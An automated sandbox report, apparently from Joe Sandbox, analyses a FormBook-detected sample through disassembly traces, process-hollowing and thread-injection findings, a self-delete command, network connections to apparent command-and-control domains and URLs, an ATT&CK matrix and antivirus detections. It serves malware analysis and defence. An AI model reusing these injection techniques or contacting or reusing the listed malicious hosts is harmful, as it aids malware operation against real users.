Source: C:\Windows\SysWOW64\cscript.exe	Code function: 9_2_04841074 mov eax, dword ptr fs:[00000030h]	9_2_04841074
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 9_2_04779080 mov eax, dword ptr fs:[00000030h]	9_2_04779080
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 9_2_047F3884 mov eax, dword ptr fs:[00000030h]	9_2_047F3884
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 9_2_047F3884 mov eax, dword ptr fs:[00000030h]	9_2_047F3884
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 9_2_0477B171 mov eax, dword ptr fs:[00000030h]	9_2_0477B171
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 9_2_0477B171 mov eax, dword ptr fs:[00000030h]	9_2_0477B171
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 9_2_0479C577 mov eax, dword ptr fs:[00000030h]	9_2_0479C577
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 9_2_0479C577 mov eax, dword ptr fs:[00000030h]	9_2_0479C577
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 9_2_0477C962 mov eax, dword ptr fs:[00000030h]	9_2_0477C962
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 9_2_04797D50 mov eax, dword ptr fs:[00000030h]	9_2_04797D50
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 9_2_047B3D43 mov eax, dword ptr fs:[00000030h]	9_2_047B3D43
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 9_2_0479B944 mov eax, dword ptr fs:[00000030h]	9_2_0479B944
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 9_2_0479B944 mov eax, dword ptr fs:[00000030h]	9_2_0479B944
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 9_2_047F3540 mov eax, dword ptr fs:[00000030h]	9_2_047F3540
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 9_2_047A513A mov eax, dword ptr fs:[00000030h]	9_2_047A513A
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 9_2_047A513A mov eax, dword ptr fs:[00000030h]	9_2_047A513A
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 9_2_047A4D3B mov eax, dword ptr fs:[00000030h]	9_2_047A4D3B
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 9_2_047A4D3B mov eax, dword ptr fs:[00000030h]	9_2_047A4D3B
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 9_2_047A4D3B mov eax, dword ptr fs:[00000030h]	9_2_047A4D3B
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 9_2_0477AD30 mov eax, dword ptr fs:[00000030h]	9_2_0477AD30
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 9_2_047FA537 mov eax, dword ptr fs:[00000030h]	9_2_047FA537
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 9_2_04783D34 mov eax, dword ptr fs:[00000030h]	9_2_04783D34
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 9_2_04783D34 mov eax, dword ptr fs:[00000030h]	9_2_04783D34
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 9_2_04783D34 mov eax, dword ptr fs:[00000030h]	9_2_04783D34
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 9_2_04783D34 mov eax, dword ptr fs:[00000030h]	9_2_04783D34
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 9_2_04783D34 mov eax, dword ptr fs:[00000030h]	9_2_04783D34
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 9_2_04783D34 mov eax, dword ptr fs:[00000030h]	9_2_04783D34
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 9_2_04783D34 mov eax, dword ptr fs:[00000030h]	9_2_04783D34
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 9_2_04783D34 mov eax, dword ptr fs:[00000030h]	9_2_04783D34
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 9_2_04783D34 mov eax, dword ptr fs:[00000030h]	9_2_04783D34
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 9_2_04783D34 mov eax, dword ptr fs:[00000030h]	9_2_04783D34
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 9_2_04783D34 mov eax, dword ptr fs:[00000030h]	9_2_04783D34
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 9_2_04783D34 mov eax, dword ptr fs:[00000030h]	9_2_04783D34
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 9_2_04783D34 mov eax, dword ptr fs:[00000030h]	9_2_04783D34
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 9_2_04794120 mov eax, dword ptr fs:[00000030h]	9_2_04794120
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 9_2_04794120 mov eax, dword ptr fs:[00000030h]	9_2_04794120
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 9_2_04794120 mov eax, dword ptr fs:[00000030h]	9_2_04794120
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 9_2_04794120 mov eax, dword ptr fs:[00000030h]	9_2_04794120
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 9_2_04794120 mov ecx, dword ptr fs:[00000030h]	9_2_04794120
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 9_2_048041E8 mov eax, dword ptr fs:[00000030h]	9_2_048041E8
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 9_2_04828DF1 mov eax, dword ptr fs:[00000030h]	9_2_04828DF1
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 9_2_04779100 mov eax, dword ptr fs:[00000030h]	9_2_04779100
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 9_2_04779100 mov eax, dword ptr fs:[00000030h]	9_2_04779100
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 9_2_04779100 mov eax, dword ptr fs:[00000030h]	9_2_04779100
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 9_2_0477B1E1 mov eax, dword ptr fs:[00000030h]	9_2_0477B1E1
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 9_2_0477B1E1 mov eax, dword ptr fs:[00000030h]	9_2_0477B1E1
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 9_2_0477B1E1 mov eax, dword ptr fs:[00000030h]	9_2_0477B1E1
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 9_2_0478D5E0 mov eax, dword ptr fs:[00000030h]	9_2_0478D5E0
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 9_2_0478D5E0 mov eax, dword ptr fs:[00000030h]	9_2_0478D5E0
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 9_2_04848D34 mov eax, dword ptr fs:[00000030h]	9_2_04848D34
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 9_2_047A35A1 mov eax, dword ptr fs:[00000030h]	9_2_047A35A1
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 9_2_047AFD9B mov eax, dword ptr fs:[00000030h]	9_2_047AFD9B
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 9_2_047AFD9B mov eax, dword ptr fs:[00000030h]	9_2_047AFD9B
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 9_2_0479C182 mov eax, dword ptr fs:[00000030h]	9_2_0479C182
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 9_2_04772D8A mov eax, dword ptr fs:[00000030h]	9_2_04772D8A
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 9_2_04772D8A mov eax, dword ptr fs:[00000030h]	9_2_04772D8A
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 9_2_04772D8A mov eax, dword ptr fs:[00000030h]	9_2_04772D8A
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 9_2_04772D8A mov eax, dword ptr fs:[00000030h]	9_2_04772D8A
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 9_2_04772D8A mov eax, dword ptr fs:[00000030h]	9_2_04772D8A
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 9_2_047AA185 mov eax, dword ptr fs:[00000030h]	9_2_047AA185
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 9_2_047B927A mov eax, dword ptr fs:[00000030h]	9_2_047B927A
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 9_2_0480FE87 mov eax, dword ptr fs:[00000030h]	9_2_0480FE87
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 9_2_0479AE73 mov eax, dword ptr fs:[00000030h]	9_2_0479AE73
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 9_2_0479AE73 mov eax, dword ptr fs:[00000030h]	9_2_0479AE73
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 9_2_0479AE73 mov eax, dword ptr fs:[00000030h]	9_2_0479AE73
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 9_2_0479AE73 mov eax, dword ptr fs:[00000030h]	9_2_0479AE73
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 9_2_0479AE73 mov eax, dword ptr fs:[00000030h]	9_2_0479AE73
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 9_2_0478766D mov eax, dword ptr fs:[00000030h]	9_2_0478766D
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 9_2_04840EA5 mov eax, dword ptr fs:[00000030h]	9_2_04840EA5
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 9_2_04840EA5 mov eax, dword ptr fs:[00000030h]	9_2_04840EA5
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 9_2_04840EA5 mov eax, dword ptr fs:[00000030h]	9_2_04840EA5
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 9_2_04779240 mov eax, dword ptr fs:[00000030h]	9_2_04779240
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 9_2_04779240 mov eax, dword ptr fs:[00000030h]	9_2_04779240
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 9_2_04779240 mov eax, dword ptr fs:[00000030h]	9_2_04779240
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 9_2_04779240 mov eax, dword ptr fs:[00000030h]	9_2_04779240
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 9_2_04787E41 mov eax, dword ptr fs:[00000030h]	9_2_04787E41
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 9_2_04787E41 mov eax, dword ptr fs:[00000030h]	9_2_04787E41
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 9_2_04787E41 mov eax, dword ptr fs:[00000030h]	9_2_04787E41
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 9_2_04787E41 mov eax, dword ptr fs:[00000030h]	9_2_04787E41
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 9_2_04787E41 mov eax, dword ptr fs:[00000030h]	9_2_04787E41
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 9_2_04787E41 mov eax, dword ptr fs:[00000030h]	9_2_04787E41
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 9_2_0482FEC0 mov eax, dword ptr fs:[00000030h]	9_2_0482FEC0
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 9_2_04848ED6 mov eax, dword ptr fs:[00000030h]	9_2_04848ED6
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 9_2_0477E620 mov eax, dword ptr fs:[00000030h]	9_2_0477E620
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 9_2_04793A1C mov eax, dword ptr fs:[00000030h]	9_2_04793A1C
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 9_2_0477C600 mov eax, dword ptr fs:[00000030h]	9_2_0477C600
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 9_2_0477C600 mov eax, dword ptr fs:[00000030h]	9_2_0477C600
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 9_2_0477C600 mov eax, dword ptr fs:[00000030h]	9_2_0477C600
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 9_2_047A16E0 mov ecx, dword ptr fs:[00000030h]	9_2_047A16E0
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 9_2_047876E2 mov eax, dword ptr fs:[00000030h]	9_2_047876E2
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 9_2_047A36CC mov eax, dword ptr fs:[00000030h]	9_2_047A36CC
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 9_2_047B8EC7 mov eax, dword ptr fs:[00000030h]	9_2_047B8EC7
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 9_2_0482FE3F mov eax, dword ptr fs:[00000030h]	9_2_0482FE3F
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 9_2_0478AAB0 mov eax, dword ptr fs:[00000030h]	9_2_0478AAB0
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 9_2_0478AAB0 mov eax, dword ptr fs:[00000030h]	9_2_0478AAB0
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 9_2_047AFAB0 mov eax, dword ptr fs:[00000030h]	9_2_047AFAB0
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 9_2_047752A5 mov eax, dword ptr fs:[00000030h]	9_2_047752A5
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 9_2_047752A5 mov eax, dword ptr fs:[00000030h]	9_2_047752A5
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 9_2_047752A5 mov eax, dword ptr fs:[00000030h]	9_2_047752A5
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 9_2_047752A5 mov eax, dword ptr fs:[00000030h]	9_2_047752A5
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 9_2_047752A5 mov eax, dword ptr fs:[00000030h]	9_2_047752A5
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 9_2_04804257 mov eax, dword ptr fs:[00000030h]	9_2_04804257
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 9_2_047F46A7 mov eax, dword ptr fs:[00000030h]	9_2_047F46A7
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 9_2_0482B260 mov eax, dword ptr fs:[00000030h]	9_2_0482B260
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 9_2_0482B260 mov eax, dword ptr fs:[00000030h]	9_2_0482B260
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 9_2_04848A62 mov eax, dword ptr fs:[00000030h]	9_2_04848A62
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 9_2_047AD294 mov eax, dword ptr fs:[00000030h]	9_2_047AD294
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 9_2_047AD294 mov eax, dword ptr fs:[00000030h]	9_2_047AD294
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 9_2_047A3B7A mov eax, dword ptr fs:[00000030h]	9_2_047A3B7A
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 9_2_047A3B7A mov eax, dword ptr fs:[00000030h]	9_2_047A3B7A
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 9_2_0482D380 mov ecx, dword ptr fs:[00000030h]	9_2_0482D380
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 9_2_0483138A mov eax, dword ptr fs:[00000030h]	9_2_0483138A
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 9_2_0477DB60 mov ecx, dword ptr fs:[00000030h]	9_2_0477DB60
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 9_2_0478FF60 mov eax, dword ptr fs:[00000030h]	9_2_0478FF60
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 9_2_04845BA5 mov eax, dword ptr fs:[00000030h]	9_2_04845BA5
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 9_2_0477F358 mov eax, dword ptr fs:[00000030h]	9_2_0477F358
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 9_2_0477DB40 mov eax, dword ptr fs:[00000030h]	9_2_0477DB40
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 9_2_0478EF40 mov eax, dword ptr fs:[00000030h]	9_2_0478EF40
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 9_2_047AE730 mov eax, dword ptr fs:[00000030h]	9_2_047AE730
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 9_2_04774F2E mov eax, dword ptr fs:[00000030h]	9_2_04774F2E
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 9_2_04774F2E mov eax, dword ptr fs:[00000030h]	9_2_04774F2E
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 9_2_0484070D mov eax, dword ptr fs:[00000030h]	9_2_0484070D
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 9_2_0484070D mov eax, dword ptr fs:[00000030h]	9_2_0484070D
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 9_2_047B37F5 mov eax, dword ptr fs:[00000030h]	9_2_047B37F5
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 9_2_0480FF10 mov eax, dword ptr fs:[00000030h]	9_2_0480FF10
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 9_2_0480FF10 mov eax, dword ptr fs:[00000030h]	9_2_0480FF10
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 9_2_0483131B mov eax, dword ptr fs:[00000030h]	9_2_0483131B
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 9_2_04848B58 mov eax, dword ptr fs:[00000030h]	9_2_04848B58
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 9_2_047AB390 mov eax, dword ptr fs:[00000030h]	9_2_047AB390
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 9_2_047F7794 mov eax, dword ptr fs:[00000030h]	9_2_047F7794
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 9_2_047F7794 mov eax, dword ptr fs:[00000030h]	9_2_047F7794
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 9_2_047F7794 mov eax, dword ptr fs:[00000030h]	9_2_047F7794
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 9_2_04848F6A mov eax, dword ptr fs:[00000030h]	9_2_04848F6A
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 9_2_04781B8F mov eax, dword ptr fs:[00000030h]	9_2_04781B8F
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 9_2_04781B8F mov eax, dword ptr fs:[00000030h]	9_2_04781B8F

Source: C:\Users\user\Desktop\85vLO1Rpcy.exe	Process token adjusted: Debug			Jump to behavior
Source: C:\Windows\SysWOW64\cscript.exe	Process token adjusted: Debug			Jump to behavior

HIPS / PFW / Operating System Protection Evasion:

System process connects to network (likely due to code injection or exploit)

Show sources

Source: C:\Windows\explorer.exe	Network Connect: 172.67.129.33 80	Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 104.21.40.211 80	Jump to behavior
Source: C:\Windows\explorer.exe	Domain query: www.manageoceanaccount.com
Source: C:\Windows\explorer.exe	Domain query: www.cwdelrio.com
Source: C:\Windows\explorer.exe	Network Connect: 89.46.109.25 80	Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 162.241.62.54 80	Jump to behavior
Source: C:\Windows\explorer.exe	Domain query: www.melodezu.com
Source: C:\Windows\explorer.exe	Network Connect: 64.227.87.162 80	Jump to behavior
Source: C:\Windows\explorer.exe	Domain query: www.sprinkleresources.com
Source: C:\Windows\explorer.exe	Domain query: www.professioneconsulenza.net
Source: C:\Windows\explorer.exe	Domain query: www.fitnesstwentytwenty.com
Source: C:\Windows\explorer.exe	Network Connect: 34.102.136.180 80	Jump to behavior
Source: C:\Windows\explorer.exe	Domain query: www.mydreamtv.net
Source: C:\Windows\explorer.exe	Domain query: www.jorgeporcayo.com
Source: C:\Windows\explorer.exe	Network Connect: 78.47.57.7 80	Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 104.21.86.209 80	Jump to behavior
Source: C:\Windows\explorer.exe	Domain query: www.saludflv.info
Source: C:\Windows\explorer.exe	Domain query: www.iwccgroup.com
Source: C:\Windows\explorer.exe	Domain query: www.builtbydawn.com

Maps a DLL or memory area into another process

Show sources

Source: C:\Users\user\Desktop\85vLO1Rpcy.exe	Section loaded: unknown target: C:\Users\user\Desktop\85vLO1Rpcy.exe protection: execute and read and write	Jump to behavior
Source: C:\Users\user\Desktop\85vLO1Rpcy.exe	Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write	Jump to behavior
Source: C:\Users\user\Desktop\85vLO1Rpcy.exe	Section loaded: unknown target: C:\Windows\SysWOW64\cscript.exe protection: execute and read and write	Jump to behavior
Source: C:\Users\user\Desktop\85vLO1Rpcy.exe	Section loaded: unknown target: C:\Windows\SysWOW64\cscript.exe protection: execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\cscript.exe	Section loaded: unknown target: C:\Windows\explorer.exe protection: read write	Jump to behavior
Source: C:\Windows\SysWOW64\cscript.exe	Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write	Jump to behavior

Modifies the context of a thread in another process (thread injection)

Show sources

Source: C:\Users\user\Desktop\85vLO1Rpcy.exe	Thread register set: target process: 3424			Jump to behavior
Source: C:\Windows\SysWOW64\cscript.exe	Thread register set: target process: 3424			Jump to behavior

Queues an APC in another process (thread injection)

Show sources

Source: C:\Users\user\Desktop\85vLO1Rpcy.exe

Thread APC queued: target process: C:\Windows\explorer.exe

Jump to behavior

Sample uses process hollowing technique

Show sources

Source: C:\Users\user\Desktop\85vLO1Rpcy.exe

Section unmapped: C:\Windows\SysWOW64\cscript.exe base address: 310000

Jump to behavior

Source: C:\Users\user\Desktop\85vLO1Rpcy.exe	Process created: C:\Users\user\Desktop\85vLO1Rpcy.exe 'C:\Users\user\Desktop\85vLO1Rpcy.exe'			Jump to behavior
Source: C:\Windows\SysWOW64\cscript.exe	Process created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\85vLO1Rpcy.exe'			Jump to behavior

Source: explorer.exe, 00000005.00000000.665818761.0000000000AD8000.00000004.00000020.sdmp	Binary or memory string: ProgmanMD6
Source: explorer.exe, 00000005.00000000.694406100.0000000001080000.00000002.00000001.sdmp, cscript.exe, 00000009.00000002.917555422.0000000003000000.00000002.00000001.sdmp	Binary or memory string: Program Manager
Source: explorer.exe, 00000005.00000000.694406100.0000000001080000.00000002.00000001.sdmp, cscript.exe, 00000009.00000002.917555422.0000000003000000.00000002.00000001.sdmp	Binary or memory string: Shell_TrayWnd
Source: explorer.exe, 00000005.00000000.694406100.0000000001080000.00000002.00000001.sdmp, cscript.exe, 00000009.00000002.917555422.0000000003000000.00000002.00000001.sdmp	Binary or memory string: Progman
Source: explorer.exe, 00000005.00000000.694406100.0000000001080000.00000002.00000001.sdmp, cscript.exe, 00000009.00000002.917555422.0000000003000000.00000002.00000001.sdmp	Binary or memory string: Progmanlock
Source: explorer.exe, 00000005.00000000.684746061.000000000A716000.00000004.00000001.sdmp	Binary or memory string: Shell_TrayWnd5D

Stealing of Sensitive Information:

Yara detected FormBook

Show sources

Source: Yara match	File source: 2.2.85vLO1Rpcy.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.1.85vLO1Rpcy.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.85vLO1Rpcy.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.1.85vLO1Rpcy.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.85vLO1Rpcy.exe.2080000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.85vLO1Rpcy.exe.2080000.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000009.00000002.917381925.0000000002930000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.917639520.0000000004510000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.716808060.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000001.660809606.0000000000400000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.717508813.00000000008A0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.917267310.0000000002770000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.717586838.00000000008D0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.662578275.0000000002080000.00000040.00000001.sdmp, type: MEMORY

Remote Access Functionality:

Yara detected FormBook

Show sources

Source: Yara match	File source: 2.2.85vLO1Rpcy.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.1.85vLO1Rpcy.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.85vLO1Rpcy.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.1.85vLO1Rpcy.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.85vLO1Rpcy.exe.2080000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.85vLO1Rpcy.exe.2080000.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000009.00000002.917381925.0000000002930000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.917639520.0000000004510000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.716808060.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000001.660809606.0000000000400000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.717508813.00000000008A0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.917267310.0000000002770000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.717586838.00000000008D0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.662578275.0000000002080000.00000040.00000001.sdmp, type: MEMORY

Mitre Att&ck Matrix

Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Exfiltration	Command and Control	Network Effects	Remote Service Effects	Impact
Valid Accounts	Shared Modules1	Path Interception	Process Injection512	Virtualization/Sandbox Evasion2	OS Credential Dumping	Security Software Discovery121	Remote Services	Archive Collected Data1	Exfiltration Over Other Network Medium	Encrypted Channel1	Eavesdrop on Insecure Network Communication	Remotely Track Device Without Authorization	Modify System Partition
Default Accounts	Scheduled Task/Job	Boot or Logon Initialization Scripts	Boot or Logon Initialization Scripts	Process Injection512	LSASS Memory	Virtualization/Sandbox Evasion2	Remote Desktop Protocol	Data from Removable Media	Exfiltration Over Bluetooth	Ingress Tool Transfer3	Exploit SS7 to Redirect Phone Calls/SMS	Remotely Wipe Data Without Authorization	Device Lockout
Domain Accounts	At (Linux)	Logon Script (Windows)	Logon Script (Windows)	Deobfuscate/Decode Files or Information1	Security Account Manager	Process Discovery2	SMB/Windows Admin Shares	Data from Network Shared Drive	Automated Exfiltration	Non-Application Layer Protocol3	Exploit SS7 to Track Device Location	Obtain Device Cloud Backups	Delete Device Data
Local Accounts	At (Windows)	Logon Script (Mac)	Logon Script (Mac)	Obfuscated Files or Information3	NTDS	Remote System Discovery1	Distributed Component Object Model	Input Capture	Scheduled Transfer	Application Layer Protocol13	SIM Card Swap		Carrier Billing Fraud
Cloud Accounts	Cron	Network Logon Script	Network Logon Script	Software Packing11	LSA Secrets	System Information Discovery11	SSH	Keylogging	Data Transfer Size Limits	Fallback Channels	Manipulate Device Communication		Manipulate App Store Rankings or Ratings

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Source	Detection	Scanner	Label	Link
85vLO1Rpcy.exe	48%	ReversingLabs	Win32.Trojan.Caynamer
85vLO1Rpcy.exe	100%	Joe Sandbox ML

Dropped Files

No Antivirus matches

Unpacked PE Files

Source	Detection	Scanner	Label	Download
1.2.85vLO1Rpcy.exe.2040000.1.unpack	100%	Avira	TR/Patched.Ren.Gen	Download File
9.2.cscript.exe.4c87960.5.unpack	100%	Avira	TR/Patched.Ren.Gen	Download File
2.1.85vLO1Rpcy.exe.400000.0.unpack	100%	Avira	TR/Crypt.ZPACK.Gen	Download File
2.2.85vLO1Rpcy.exe.400000.0.unpack	100%	Avira	TR/Crypt.ZPACK.Gen	Download File
9.2.cscript.exe.2848758.2.unpack	100%	Avira	TR/Patched.Ren.Gen	Download File
1.2.85vLO1Rpcy.exe.2080000.2.unpack	100%	Avira	TR/Crypt.ZPACK.Gen	Download File

Domains

No Antivirus matches

URLs

Source	Detection	Scanner	Label
http://www.melodezu.com/dy8g/?4hoDb=qBaU/+yfeYHlIZouGPofXU4iidVfFInHYvrLlGgOmZTTl18u/I/MgAYEWpAR2vhEkSQT&m4L0u=bZcPvDKxdtw	0%	Avira URL Cloud	safe
http://www.sprinkleresources.com/dy8g/?4hoDb=QPKcqu0vMetGK+JfgUD/8nBfSHpRH5kA0PGey6xyb3gkjUZIEhl5tlPdZ8p3XQTNaLSI&m4L0u=bZcPvDKxdtw	0%	Avira URL Cloud	safe
http://www.founder.com.cn/cn/bThe	0%	URL Reputation	safe
http://www.founder.com.cn/cn/bThe	0%	URL Reputation	safe
http://www.founder.com.cn/cn/bThe	0%	URL Reputation	safe
http://www.invisiongc.net/dy8g/?4hoDb=MBhh1pO56K3YrZO9qJkl6N96HaWfS+D/lXW6/vw2t4O2Fl+GB2YqMK2ZrZIWjv5Kd9wj&m4L0u=bZcPvDKxdtw	100%	Avira URL Cloud	malware
http://www.tiro.com	0%	URL Reputation	safe
http://www.tiro.com	0%	URL Reputation	safe
